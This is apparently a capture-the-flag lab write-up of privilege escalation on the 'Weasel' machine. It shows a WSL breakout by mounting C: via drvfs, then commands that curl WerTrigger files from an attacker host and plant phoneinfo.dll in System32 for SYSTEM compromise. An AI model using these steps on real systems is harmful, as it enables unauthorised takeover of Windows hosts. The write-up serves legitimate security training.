InfoSec LAB

Weasel_Privilege_Escalation

Created: 2 min read

WSL Breakout

System level compromise has been achieved on the WSL environment of the DEV-DATASCI-JUP(10.10.232.68) host. Attempting to breakout of the WSL environment

/mnt/c

root@DEV-DATASCI-JUP:/# ll /mnt/c
total 0
drwxrwxrwx 1 root root 4096 Aug 25  2022 ./
drwxr-xr-x 1 root root 4096 Aug 25  2022 ../

Checking the /mnt/c directory reveals that it’s empty. This is the directory that C:\ drive gets mounted to

An online resource reveals that the host filesystem can be mounted from within the WSL environment.

Official Microsoft document shows that DrvFs is a filesystem plugin to WSL to support the Windows filesystem(NTFS).

Mounting

root@DEV-DATASCI-JUP:/mnt# mount -t drvfs C: /mnt/c
root@DEV-DATASCI-JUP:/mnt# cd c ; ll
ls: cannot read symbolic link 'Documents and Settings': Permission denied
ls: cannot access 'pagefile.sys': Permission denied
ls: 'System Volume Information': Permission denied
total 0
drwxrwxrwx 1 root root 4096 Aug 25  2022 $Recycle.Bin/
drwxrwxrwx 1 root root 4096 Mar 14  2023 ./
drwxr-xr-x 1 root root 4096 Aug 25  2022 ../
lrwxrwxrwx 1 root root   12 Aug 25  2022 Documents and Settings
drwxrwxrwx 1 root root 4096 Aug 25  2022 PerfLogs/
drwxrwxrwx 1 root root 4096 Aug 25  2022 Program Files/
drwxrwxrwx 1 root root 4096 Aug 25  2022 Program Files (x86)/
drwxrwxrwx 1 root root 4096 Mar 13  2023 ProgramData/
drwxrwxrwx 1 root root 4096 Aug 25  2022 Recovery/
d--x--x--x 1 root root 4096 Aug 25  2022 System Volume Information/
drwxrwxrwx 1 root root 4096 Aug 25  2022 Users/
drwxrwxrwx 1 root root 4096 Mar 13  2023 Windows/
drwxrwxrwx 1 root root 4096 Aug 25  2022 datasci-team/
-????????? ? ?    ?       ?            ? pagefile.sys

Mounting successful. Privileged read and write accesses are granted.

WerTrigger

Privileged file write always leads to a form of DLL injection as administrators are able to write DLL to anywhere in the filesystem.

I will be using WerTrigger

root@DEV-DATASCI-JUP:/mnt/c# mkdir tmp
root@DEV-DATASCI-JUP:/mnt/c# curl -s http://10.9.0.130/WerTrigger/bin/WerTrigger.exe -o tmp/WerTrigger.exe
root@DEV-DATASCI-JUP:/mnt/c# curl -s http://10.9.0.130/WerTrigger/bin/Report.wer -o tmp/Report.wer
 
root@DEV-DATASCI-JUP:/mnt/c# curl -s http://10.9.0.130/WerTrigger/bin/phoneinfo.dll -o Windows/System32/phoneinfo.dll

Delivering the exploit to the host system. phoneinfo.dll goes into the C:\Windows\System32 directory through privileged file write.

Leveraging the existing SSH session from the lateral movement to the host system earlier, I can perform execution of the WerTrigger.exe PE file. Exploit successful. System level compromise

Interactive Graph View

Backlinks